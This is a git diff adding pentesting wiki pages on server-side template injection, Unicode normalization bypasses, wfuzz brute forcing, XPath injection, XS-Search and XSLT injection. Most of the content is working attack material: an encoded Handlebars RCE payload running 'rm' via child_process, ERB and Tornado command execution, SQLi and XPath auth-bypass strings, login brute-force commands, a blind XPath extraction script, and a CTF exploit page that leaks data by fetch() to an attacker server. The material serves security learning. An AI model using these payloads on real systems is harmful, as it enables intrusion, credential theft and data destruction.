+wrtz%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0d%0a%20%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0d%0a%20%20%20%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%20%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%28%27%72%6d%20%2f%68%6f%6d%65%2f%63%61%72%6c%6f%73%2f%6d%6f%72%61%6c%65%2e%74%78%74%27%29%3b%22%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0d%0a%20%20%20%20%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%7d%7d%0d%0a%20%20%20%20%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%20%20%20%20%20%20%7b%7b%2f%65%61%63%68%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%7b%7b%2f%77%69%74%68%7d%7d
+```
+
+#### More information
+
+* [http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html](http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
+
+### ERB \(Ruby\)
+
+* `{{7*7}} = {{7*7}}`
+* `${7*7} = ${7*7}`
+* `<%= 7*7 %> = 49`
+* `<%= foobar %> = Error`
+
+```text
+<%= system("whoami") %>
+<%= Dir.entries('/') %>
+<%= File.open('/example/arbitrary-file').read %>
+```
+
+#### More information
+
+* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection\#ruby](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby)
+
+### Tornado \(Python\)
+
+* `{{7*7}} = 49`
+* `${7*7} = ${7*7}`
+* `{{foobar}} = Error`
+* `{{7*'7'}} = 7777777`
+
+```text
+{% import foobar %} = Error
+{% import os %}{{os.system('whoami')}}
+```
+
+#### More information
+
+### Django Tricks \(Python\)
+
+Django is going to be using as template engine **Jinja2**.
+
+* `{{7*7}} = Error`
+* `${7*7} = ${7*7}`
+* `{{foobar}} Nothing`
+
+```text
+{% debug %}
+{{settings.SECRET_KEY}}
+```
+
+#### More information
+
+* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection\#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)
+
+### More Exploits
+
+Check the rest of [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection) for more exploits. Also you can find interesting tags information in [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)
+
+## BlackHat PDF
+
+{% file src="../.gitbook/assets/en-server-side-template-injection-rce-for-the-modern-web-app-blackhat-15.pdf" %}
+
+## Related Help
+
+If you think it could be useful, read:
+
+* [Flask tricks](../pentesting/pentesting-web/flask.md)
+* [Python magic functions](../misc/basic-python/magic-methods.md)
+
+##  Tools
+
+* [https://github.com/epinna/tplmap](https://github.com/epinna/tplmap)
+
+## Practice
+
+* [https://portswigger.net/web-security/server-side-template-injection/exploiting](https://portswigger.net/web-security/server-side-template-injection/exploiting)
+* [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)
+
+
+
diff --git a/pentesting-web/unicode-normalization-vulnerability.md b/pentesting-web/unicode-normalization-vulnerability.md
new file mode 100644
index 00000000..2e1d1d4f
--- /dev/null
+++ b/pentesting-web/unicode-normalization-vulnerability.md
@@ -0,0 +1,90 @@
+# Unicode Normalization vulnerability
+
+## Background
+
+Normalization ensures two strings that may use a different binary representation for their characters have the same binary value after normalization.
+
+There are two overall types of equivalence between characters, “**Canonical Equivalence**” and “**Compatibility Equivalence**”:  
+**Canonical Equivalent** characters are assumed to have the same appearance and meaning when printed or displayed. **Compatibility Equivalence** is a weaker equivalence, in that two values may represent the same abstract character but can be displayed differently. There are **4 Normalization algorithms** defined by the **Unicode** standard; **NFC, NFD, NFKD and NFKD**, each applies Canonical and Compatibility normalization techniques in a different way. You can read more on the different techniques at Unicode.org.
+
+### Unicode Encoding
+
+Although Unicode was in part designed to solve interoperability issues, the evolution of the standard, the need to support legacy systems and different encoding methods can still pose a challenge.  
+Before we delve into Unicode attacks, the following are the main points to understand about Unicode:
+
+* Each character or symbol is mapped to a numerical value which is referred to as a “code point”.
+* The code point value \(and therefore the character itself\) is represented by 1 or more bytes in memory. LATIN-1 characters like those used in English speaking countries can be represented using 1 byte. Other languages have more characters and need more bytes to represent all the different code points \(also since they can’t use the ones already taken by LATIN-1\).
+* The term “encoding” means the method in which characters are represented as a series of bytes. The most common encoding standard is UTF-8, using this encoding scheme ASCII characters can be represented using 1 byte or up to 4 bytes for other characters.
+* When a system processes data it needs to know the encoding used to convert the stream of bytes to characters.
+* Though UTF-8 is the most common, there are similar encoding standards named UTF-16 and UTF-32, the difference between each is the number of bytes used to represent each character. i.e. UTF-16 uses a minimum of 2 bytes \(but up to 4\) and UTF-32 using 4 bytes for all characters.
+
+An example of how Unicode normalise two different bytes representing the same character:
+
+![](../.gitbook/assets/image%20%2831%29.png)
+
+**A list of Unicode equivalent characters can be found here:** [https://appcheck-ng.com/wp-content/uploads/unicode\_normalization.html](https://appcheck-ng.com/wp-content/uploads/unicode_normalization.html)
+
+### Discovering
+
+If you can find inside a webapp a value that is being echoed back, you could try to send **‘KELVIN SIGN’ \(U+0212A\)** which **normalises to "K"** \(you can send it as `%e2%84%aa`\). **If a "K" is echoed back**, then, some kind of **Unicode normalisation** is being performed.
+
+Other **example**: `%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` after **unicode** is `Leonishan`.
+
+## **Vulnerable Examples**
+
+### **SQL Injection filter bypass**
+
+Imagine a web page that is using the character `'` to create SQL queries with the user input. This web, as a security measure, **deletes** all occurrences of the character **`'`** from the user input, but **after that deletion** and **before the creation** of the query, it **normalises** using **Unicode** the input of the user.
+
+Then, a malicious user could insert a different Unicode character equivalent to `' (0x27)` like `%ef%bc%87` , when the input gets normalised, a single quote is created and a **SQLInjection vulnerability** appears:
+
+![](../.gitbook/assets/image%20%28319%29.png)
+
+#### Some interesting Unicode characters
+
+* `o` -- %e1%b4%bc
+* `r` -- %e1%b4%bf
+* `1` -- %c2%b9
+* `=` -- %e2%81%bc
+* `/` -- %ef%bc%8f
+* `-`--  %ef%b9%a3
+* `#`--  %ef%b9%9f
+* `*`--  %ef%b9%a1
+* `'` -- %ef%bc%87
+* `"` -- %ef%bc%82
+* `|` -- %ef%bd%9c
+
+```text
+' or 1=1-- -
+%ef%bc%87+%e1%b4%bc%e1%b4%bf+%c2%b9%e2%81%bc%c2%b9%ef%b9%a3%ef%b9%a3+%ef%b9%a3
+
+" or 1=1-- -
+%ef%bc%82+%e1%b4%bc%e1%b4%bf+%c2%b9%e2%81%bc%c2%b9%ef%b9%a3%ef%b9%a3+%ef%b9%a3
+
+' || 1==1//
+%ef%bc%87+%ef%bd%9c%ef%bd%9c+%c2%b9%e2%81%bc%e2%81%bc%c2%b9%ef%bc%8f%ef%bc%8f
+
+" || 1==1//
+%ef%bc%82+%ef%bd%9c%ef%bd%9c+%c2%b9%e2%81%bc%e2%81%bc%c2%b9%ef%bc%8f%ef%bc%8f
+```
+
+### XSS \(Cross Site Scripting\)
+
+You could use one of the following characters to trick the webapp and exploit a XSS:
+
+![](../.gitbook/assets/image%20%2895%29.png)
+
+Notice that for example the first Unicode character purposed can be sent as: `%e2%89%ae` or as `%u226e`
+
+![](../.gitbook/assets/image%20%28215%29.png)
+
+## References
+
+**All the information of this page was taken from:** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/\#**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/#)
+
+**Other references:**
+
+* \*\*\*\*[**https://labs.spotify.com/2013/06/18/creative-usernames/**](https://labs.spotify.com/2013/06/18/creative-usernames/)\*\*\*\*
+* \*\*\*\*[**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)\*\*\*\*
+* \*\*\*\*[**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass_WAF_Unicode.html)\*\*\*\*
+
diff --git a/pentesting-web/web-tool-wfuzz.md b/pentesting-web/web-tool-wfuzz.md
new file mode 100644
index 00000000..73dcec2b
--- /dev/null
+++ b/pentesting-web/web-tool-wfuzz.md
@@ -0,0 +1,146 @@
+# Web Tool - WFuzz
+
+A tool to FUZZ web applications anywhere.
+
+> Wfuzz has been created to facilitate the task in web applications assessments and it is based on a simple concept: it replaces any reference to the FUZZ keyword by the value of a given payload.
+
+## Installation
+
+Installed in Kali
+
+Github: [https://github.com/xmendez/wfuzz](https://github.com/xmendez/wfuzz)
+
+```text
+pip install wfuzz
+```
+
+## Filtering options
+
+```bash
+--hs/ss "regex" #Hide/Show
+#Simple example, match a string: "Invalid username"
+#Regex example: "Invalid *"
+
+--hc/sc CODE #Hide/Show by code in response
+--hl/sl NUM #ide/Show by number of lines in response
+--hw/sw NUM #ide/Show by number of words in response
+--hc/sc NUM #ide/Show by number of chars in response
+```
+
+## Output options
+
+```bash
+wfuzz -e printers #Prints the available output formats
+-f /tmp/output,csv #Saves the output in that location in csv format
+```
+
+### Encoders options
+
+```bash
+wfuzz -e encoders #Prints the available encoders
+#Examples: urlencode, md5, base64, hexlify, uri_hex, doble urlencode
+```
+
+In order to use a encoder, you have to indicate it in the **"-w"** or **"-z"** option.
+
+Examples:
+
+```text
+-z file,/path/to/file,md5 #Will use a list inside the file, and will trnasform each value into its md5 hash before sending it
+-w /path/to/file,base64 #Will use a list, and transforms to base64
+-z list,each-element-here,hexlify #Inline list and to hex before sending values
+```
+
+## CheetSheet
+
+### Login Form bruteforce
+
+#### **POST, Single list, filter string \(hide\)**
+
+```bash
+wfuzz -c -w users.txt --hs "Login name" -d "name=FUZZ&password=FUZZ&autologin=1&enter=Sign+in" http://zipper.htb/zabbix/index.php
+#Here we have filtered by line
+```
+
+#### **POST, 2 lists, filder code \(show\)**
+
+```bash
+wfuzz.py -c -z file,users.txt -z file,pass.txt --sc 200 h"name=FUZZ&password=FUZ2Z&autologin=1&enter=Sign+in" http://zipper.htb/zabbix/index.php
+#Here we have filtered by code
+```
+
+#### **GET, 2 lists, filter string \(show\), proxy, cookies**
+
+```text
+wfuzz -c -w users.txt -w pass.txt --ss "Welcome " -p 127.0.0.1:8080:HTML -b "PHPSESSIONID=1234567890abcdef;customcookie=hey" "http://example.com/index.php?username=FUZZ&password=FUZ2Z&action=sign+in"
+```
+
+### Bruteforce Dicrectory/RESTful bruteforce
+
+[Arjun parameters wordlist](https://raw.githubusercontent.com/s0md3v/Arjun/master/db/params.txt)
+
+```text
+wfuzz -c -w /tmp/tmp/params.txt --hc 404 https://domain.com/api/FUZZ
+```
+
+### Header Authentication
+
+#### **Basic, 2 lists, filter string \(show\), proxy**
+
+```text
+wfuzz -c -w users.txt -w pass.txt -p 127.0.0.1:8080:HTML --ss "Welcome" --basic FUZZ:FUZ2Z "http://example.com/index.php"
+```
+
+#### **NTLM, 2 lists, filter string \(show\), proxy**
+
+```text
+wfuzz -c -w users.txt -w pass.txt -p 127.0.0.1:8080:HTML --ss "Welcome" --ntlm 'domain\FUZZ:FUZ2Z' "http://example.com/index.php"
+```
+
+### Cookie/Header bruteforce \(vhost brute\)
+
+#### **Cookie, filter code \(show\), proxy**
+
+```text
+wfuzz -c -w users.txt -p 127.0.0.1:8080:HTML --ss "Welcome " -H "Cookie:id=1312321&user=FUZZ"  "http://example.com/index.php"
+```
+
+#### **User-Agent, filter code \(hide\), proxy**
+
+```text
+wfuzz -c -w user-agents.txt -p 127.0.0.1:8080:HTML --ss "Welcome " -H "User-Agent: FUZZ"  "http://example.com/index.php"
+```
+
+#### **Host**
+
+```text
+wfuzz -c -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-
+top1million-20000.txt --hc 400,404,403 -H "Host: FUZZ.example.com" -u 
+http://example.com -t 100
+```
+
+### HTTP Verbs \(methods\) bruteforce
+
+#### **Using file**
+
+```text
+wfuzz -c -w methods.txt -p 127.0.0.1:8080:HTML --sc 200 -X FUZZ "http://example.com/index.php"
+```
+
+#### **Using inline list**
+
+```text
+$ wfuzz -z list,GET-HEAD-POST-TRACE-OPTIONS -X FUZZ http://testphp.vulnweb.com/
+```
+
+### Directory & Files Bruteforce
+
+```text
+#Filter by whitelisting codes
+wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --sc 200,202,204,301,302,307,403 http://example.com/uploads/FUZZ
+```
+
+## Tool to bypass Webs
+
+[https://github.com/carlospolop/fuzzhttpbypass](https://github.com/carlospolop/fuzzhttpbypass)
+
diff --git a/pentesting-web/xpath-injection.md b/pentesting-web/xpath-injection.md
new file mode 100644
index 00000000..66b748bc
--- /dev/null
+++ b/pentesting-web/xpath-injection.md
@@ -0,0 +1,265 @@
+# XPATH injection
+
+XPath Injection is an attack technique used to exploit applications that construct XPath \(XML Path Language\) queries from user-supplied input to query or navigate XML documents.
+
+Info about how to make queries: [https://www.w3schools.com/xml/xpath\_syntax.asp](https://www.w3schools.com/xml/xpath_syntax.asp)
+
+## **Basic Syntax**
+
+### Nodes
+
+| Expression | Description |
+| :--- | :--- |
+| nodename | Selects all nodes with the name "nodename" |
+| / | Selects from the root node |
+| // | Selects nodes in the document from the current node that match the selection no matter where they are |
+| . | Selects the current node |
+| .. | Selects the parent of the current node |
+| @ | Selects attributes |
+
+### **Examples:**
+
+| Path Expression | Result |
+| :--- | :--- |
+| bookstore | Selects all nodes with the name "bookstore" |
+| /bookstore | Selects the root element bookstore**Note:** If the path starts with a slash \( / \) it always represents an absolute path to an element! |
+| bookstore/book | Selects all book elements that are children of bookstore |
+| //book | Selects all book elements no matter where they are in the document |
+| bookstore//book | Selects all book elements that are descendant of the bookstore element, no matter where they are under the bookstore element |
+| //@lang | Selects all attributes that are named lang |
+
+### Predicates
+
+<table>
+  <thead>
+    <tr>
+      <th style="text-align:left">Path Expression</th>
+      <th style="text-align:left">Result</th>
+    </tr>
+  </thead>
+  <tbody>
+    <tr>
+      <td style="text-align:left">/bookstore/book[1]</td>
+      <td style="text-align:left">
+        <p>Selects the first book element that is the child of the bookstore element.<b>Note:</b> In
+          IE 5,6,7,8,9 first node is[0], but according to W3C, it is [1]. To solve
+          this problem in IE, set the SelectionLanguage to XPath:</p>
+        <p>In JavaScript: xml.setProperty(&quot;SelectionLanguage&quot;,&quot;XPath&quot;);</p>
+      </td>
+    </tr>
+    <tr>
+      <td style="text-align:left">/bookstore/book[last()]</td>
+      <td style="text-align:left">Selects the last book element that is the child of the bookstore element</td>
+    </tr>
+    <tr>
+      <td style="text-align:left">/bookstore/book[last()-1]</td>
+      <td style="text-align:left">Selects the last but one book element that is the child of the bookstore
+        element</td>
+    </tr>
+    <tr>
+      <td style="text-align:left">/bookstore/book[position()&lt;3]</td>
+      <td style="text-align:left">Selects the first two book elements that are children of the bookstore
+        element</td>
+    </tr>
+    <tr>
+      <td style="text-align:left">//title[@lang]</td>
+      <td style="text-align:left">Selects all the title elements that have an attribute named lang</td>
+    </tr>
+    <tr>
+      <td style="text-align:left">//title[@lang=&apos;en&apos;]</td>
+      <td style="text-align:left">Selects all the title elements that have a &quot;lang&quot; attribute
+        with a value of &quot;en&quot;</td>
+    </tr>
+    <tr>
+      <td style="text-align:left">/bookstore/book[price&gt;35.00]</td>
+      <td style="text-align:left">Selects all the book elements of the bookstore element that have a price
+        element with a value greater than 35.00</td>
+    </tr>
+    <tr>
+      <td style="text-align:left">/bookstore/book[price&gt;35.00]/title</td>
+      <td style="text-align:left">Selects all the title elements of the book elements of the bookstore element
+        that have a price element with a value greater than 35.00</td>
+    </tr>
+  </tbody>
+</table>
+
+### Unknown Nodes
+
+| Wildcard | Description |
+| :--- | :--- |
+| \* | Matches any element node |
+| @\* | Matches any attribute node |
+| node\(\) | Matches any node of any kind |
+
+### **Examples:**
+
+| Path Expression | Result |
+| :--- | :--- |
+| /bookstore/\* | Selects all the child element nodes of the bookstore element |
+| //\* | Selects all elements in the document |
+| //title\[@\*\] | Selects all title elements which have at least one attribute of any kind |
+
+## Example
+
+```text
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<data>
+<user>
+    <name>pepe</name>
+    <password>peponcio</password>
+    <account>admin</account>
+</user>
+<user>
+    <name>mark</name>
+    <password>m12345</password>
+    <account>regular</account>
+</user>
+<user>
+    <name>fino</name>
+    <password>fino2</password>
+    <account>regular</account>
+</user>
+</data>
+```
+
+```text
+All names - [pepe, mark, fino]
+name
+//name
+//name/node()
+//name/child::node()
+user/name
+user//name
+/user/name
+//user/name
+
+All values - [pepe, peponcio, admin, mark, ...]
+//user/node()
+//user/child::node()
+
+
+Positions
+//user[position()=1]/name #pepe
+//user[last()-1]/name #mark
+//user[position()=1]/child::node()[position()=2] #peponcio (password)
+
+Functions
+count(//user/node()) #3*3 = 9 (count all values)
+string-length(//user[position()=1]/child::node()[position()=1]) #Length of "pepe" = 4
+substrig(//user[position()=2/child::node()[position()=1],2,1) #Substring of mark: pos=2,length=1 --> "a"
+```
+
+## Authentication Bypass
+
+### **Example of queries:**
+
+```text
+string(//user[name/text()='+VAR_USER+' and password/text()='+VAR_PASSWD+']/account/text())
+$q = '/usuarios/usuario[cuenta="' . $_POST['user'] . '" and passwd="' . $_POST['passwd'] . '"]';
+```
+
+### **OR bypass in user and password \(same value in both\)**
+
+```text
+' or '1'='1
+' or ''='
+string(//user[name/text()='' or '1'='1' and password/text()='' or '1'='1']/account/text())
+
+Select account
+Select the account using the username and use one of the previous values in the password field
+```
+
+### **Abusing null injection**
+
+```text
+Username: ' or 1]%00
+```
+
+### **Double OR in Username or in password** \(is valid with only 1 vulnerable field\)
+
+IMPORTANT: Notice that the **"and" is the first operation made**.
+
+```text
+Bypass with first match
+(This requests are also valid without spaces)
+' or /* or '
+' or "a" or '
+' or 1 or '
+' or true() or '
+string(//user[name/text()='' or true() or '' and password/text()='']/account/text())
+
+Select account
+'or string-length(name(.))<10 or' #Select account with length(name)<10
+'or contains(name,'adm') or' #Select first account having "adm" in the name
+'or contains(.,'adm') or' #Select first account having "adm" in the current value
+'or position()=2 or' #Select 2º account
+string(//user[name/text()=''or position()=2 or'' and password/text()='']/account/text())
+
+Select account (name known)
+admin' or '
+admin' or '1'='2
+string(//user[name/text()='admin' or '1'='2' and password/text()='']/account/text())
+```
+
+## String extraction
+
+The output contains strings and the user can manipulate the values to search:
+
+```text
+/user/username[contains(., '+VALUE+')]
+```
+
+```text
+') or 1=1 or (' #Get all names
+') or 1=1] | //user/password[('')=(' #Get all names and passwords
+') or 2=1] | //user/node()[('')=(' #Get all values
+')] | //./node()[('')=(' #Get all values
+')] | //node()[('')=(' #Get all values
+') or 1=1] | //user/password[('')=(' #Get all names and passwords
+')] | //password%00 #All names and passwords (abusing null injection)
+')]/../*[3][text()!=(' #All the passwords
+')] | //user/*[1] | a[(' #The ID of all users
+')] | //user/*[2] | a[(' #The name of all users
+')] | //user/*[3] | a[(' #The password of all users
+')] | //user/*[4] | a[(' #The account of all users
+```
+
+## Blind Explotation
+
+### **Get length of a value and extract it by comparisons:** 
+
+```text
+' or string-length(//user[position()=1]/child::node()[position()=1])=4 or ''=' #True if length equals 4
+' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''=' #True is first equals "a"
+
+Other way
+substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
+```
+
+### **Example:**
+
+```text
+import requests, string 
+
+flag = ""
+l = 0
+alphabet = string.ascii_letters + string.ascii_digits + "{}_()"
+for i in range(30): 
+    r = requests.get("http://example.com?action=user&userid=2 and string-length(password)=" + str(i)) 
+    if ("TRUE_COND" in r.text): 
+        l = i 
+        break 
+print("[+] Password length: " + str(l)) 
+for i in range(1, l + 1): #print("[i] Looking for char number " + str(i)) 
+    for al in alphabet: 
+        r = requests.get("http://example.com?action=user&userid=2 and substring(password,"+str(i)+",1)="+al)
+        if ("TRUE_COND" in r.text): 
+            flag += al
+            print("[+] Flag: " + flag) 
+            break
+```
+
+## References
+
+[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection)
+
diff --git a/pentesting-web/xs-search.md b/pentesting-web/xs-search.md
new file mode 100644
index 00000000..d495c4ab
--- /dev/null
+++ b/pentesting-web/xs-search.md
@@ -0,0 +1,145 @@
+# XS-Search
+
+It is a side channel attack to extract information that other users can access and you can't.
+
+It requires:
+
+* A CSRF vulnerability
+* A way to distniguish if the content was accessed or not
+
+## XS-Search Time attack
+
+Basically, you exploit a **CSRF vulnerability** to make a specific user access some **information** that the **victim can access** but you can't. Then, you **check** the **time** it take the request to be responded and depending on that you can know if the content was correctly accessed or not.
+
+For example, imagine that the **admin of a web** page can **access all** the inside the **webfiles**  service and **you only** can access **yours**, and you want to know the **content** of a **file** that starts with the string "_**flag**_".
+
+There is a **CSRF** vulnerability in the **seach by content** function and you can make the **admin visit any page**. Then, you could make the admin visit a malicious web server \(yours\) that will **exploit** the **CSRF** and will make the victim **search for** the file that starts with "_**flag**_". The attacker will make a **loop** so it will make the victim **search for every possibility** in: _flagX_. Then, if a character took **more time** that the rest, you can **asume** that it was the **correct** one and you can start a **new loop** with "_flag{X_" until you get the flag.
+
+That is the **idea** but in the **real world** you need queries that retrive content take **much more time** that the queries that doesn't return anything.
+
+For more information you can read:
+
+* [https://medium.com/@luanherrera/xs-searching-googles-bug-tracker-to-find-out-vulnerable-source-code-50d8135b7549](https://medium.com/@luanherrera/xs-searching-googles-bug-tracker-to-find-out-vulnerable-source-code-50d8135b7549)
+* [https://www.researchgate.net/publication/280738245\_Cross-Site\_Search\_Attacks](https://www.researchgate.net/publication/280738245_Cross-Site_Search_Attacks)
+
+## XS-Search - Iframe
+
+Suppose that you can **insert** the **page** that has the **secret** content **inside an Iframe**.
+
+You can **make the victim search** for the file that contains "_**flag**_" using an **Iframe** \(exploiting a CSRF like in the prevous situation\). Inside the Iframe you know that the _**onload event**_ will be **executed always at least once**. Then, you can **change** the **URL** of the **iframe** but changing only the **content** of the **hash** inside the URL.
+
+For example:
+
+1. **URL1**: www.attacker.com/xssearch\#try1
+2. **URL2**: www.attacker.com/xssearch\#try2
+
+If the first URL was **successfully loaded**, then, when **changing** the **hash** part of the URL the **onload** event **won't be triggered** again. But **if** the page had some kind of **error** when **loading**, then, the **onload** event will be **triggered again**.
+
+Then, you can **distinguish between** a **correctly** loaded page or page that has an **error** when is accessed.
+
+If you can make the page error when the correct content is accessed and make it load correctly when any content is accessed, then you can make a loop to extract all the information without meassuring the time.
+
+### Iframe Chrome XSS Auditor
+
+Imagine the **same situation as in the Timing attack method** and you also know that the **admin** is using a **Chrome browser** \(for example, Chrome-headless\) **with Chrome XSS Auditor.**
+
+Then, you can use **iframes** to make the victim **search** for the page containing "_**flagX**_" \(beeing X **any** possible **character**\)inside a loop, and you also add to the URL inside the iframes a **fake parameter** that **contains javascript code that will only appear when a valid content is retrived**.
+
+For example, if when you **search for** the **content** _**"my file"**_ the web server responds with a page that **includes** this **javascript** code:
+
+```text
+<script>console.log("you found someting");</script>
+```
+
+If you send a query like:
+
+```text
+www.victim.com/search?q=my+file&fake_xss=<script>console.log("you+found+something");<script>
+```
+
+The **Chrome XSS Auditor will block** the page and an **error** will appear.
+
+Then, you can use Chrome XSS Auditor to **launch an error** when a **valid response is sent** from the victim server. Then, with the **Iframe** trick you can **detect** when you have find a **file** that **contains** "_**flag**_" **and the next valid character**.
+
+For more information: [https://www.youtube.com/watch?v=HcrQy0C-hEA](https://www.youtube.com/watch?v=HcrQy0C-hEA)
+
+### Abusing Chrome XSS Auditor to steal tokens
+
+Using the previous technique \(with Chrome XSS Auditor\) you can **steal chunks of the code returned to a user** \(like tokens for example\). For more information: [https://portswigger.net/blog/abusing-chromes-xss-auditor-to-steal-tokens](https://portswigger.net/blog/abusing-chromes-xss-auditor-to-steal-tokens)
+
+Please, notice that you will steal information returned to a user and not any code from the web server.
+
+## Custom Detection
+
+In the **fbcft2019** the **challenge**: **secret note keeper** was resolved exploiting a XS-Search.
+
+You could make the **administrator** \(a headlessChrome\) **visit any page** and there was a **CSRF** vulnerable page that was able to **search files by content**. You also **knew** that the **flag starts** by _**fb{**_ and only the admin had access to it.
+
+It was also important to notice that when you made a **search**, the results of the seach **appeared inside** an **iframe** \(if something was found\). And **none iframe appeared** if **anything** was found.
+
+So, you could make the admin visit your exploit that will be a **loop of every possible charater** inside _fb{X_ inside an iframe. And using:
+
+```text
+contentWindow.frames.length != 0
+```
+
+You could **check** how **many iframes** where created **inside your iframe**, and **if an**y, then the **character** would be **correct** and you could start extracting the next one.
+
+This is a code example of this from: [https://sectt.github.io/writeups/FBCTF19/secret\_note\_keeper/README](https://sectt.github.io/writeups/FBCTF19/secret_note_keeper/README)
+
+```text
+<!DOCTYPE html>
+<html>
+
+<head>
+    <title>fbctf secret note keeper</title>
+</head>
+
+<body></body>
+<script>
+var chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^`{|}~ ';
+var charLen = chars.length;
+var ENDPOINT = "http://challenges.fbctf.com:8082/search?query="
+var x = document.createElement('iframe');
+
+function search(leak, charCounter) {
+    var curChar = chars[charCounter];
+    //Chek if the character is valid
+    x.setAttribute("src", 'http://challenges.fbctf.com:8082/search?query=' + leak + curChar);
+    document.body.appendChild(x);
+    console.log("leak = " + leak + curChar);
+    //When the page inside the iframe is loaded
+    x.onload = () => {
+    //Check the number of iframes inside
+        if (x.contentWindow.frames.length != 0) {
+        // If 1 or more, then, the character was valid
+            fetch('http://myserver/leak?' + escape(leak), {
+                method: "POST",
+                mode: "no-cors",
+                credentials: "include"
+            });
+            leak += curChar
+        }
+        search(leak, (charCounter + 1) % chars.length);
+    }
+}
+
+function exploit() {
+    search("fb{", 0);
+}
+
+exploit();
+</script>
+
+</html>
+
+```
+
+
+
+## More information
+
+{% embed url="https://github.com/xsleaks/xsleaks" %}
+
+[https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle)
+
diff --git a/pentesting-web/xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md b/pentesting-web/xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md
new file mode 100644
index 00000000..13d22c43
--- /dev/null
+++ b/pentesting-web/xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md
@@ -0,0 +1,218 @@
+# XSLT Server Side Injection \(Extensible Stylesheet Languaje Transformations\)
+
+It is used to transform XML documents in another kind. Versions: 1, 2 and 3 \(1 is the most used\).  
+The transformation can be done in the server or in the browser\).
+
+The most used frameworks are: **Libxslt** \(Gnome\), **Xalan** \(Apache\) and **Saxon** \(Saxonica\).
+
+## Fingerprint
+
+Upload this and take information
+
+```text
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+<xsl:template match="/">
+ Version: <xsl:value-of select="system-property('xsl:version')" /><br />
+ Vendor: <xsl:value-of select="system-property('xsl:vendor')" /><br />
+ Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /><br />
+ <xsl:if test="system-property('xsl:product-name')">
+ Product Name: <xsl:value-of select="system-property('xsl:product-name')" /><br />
+ </xsl:if>
+ <xsl:if test="system-property('xsl:product-version')">
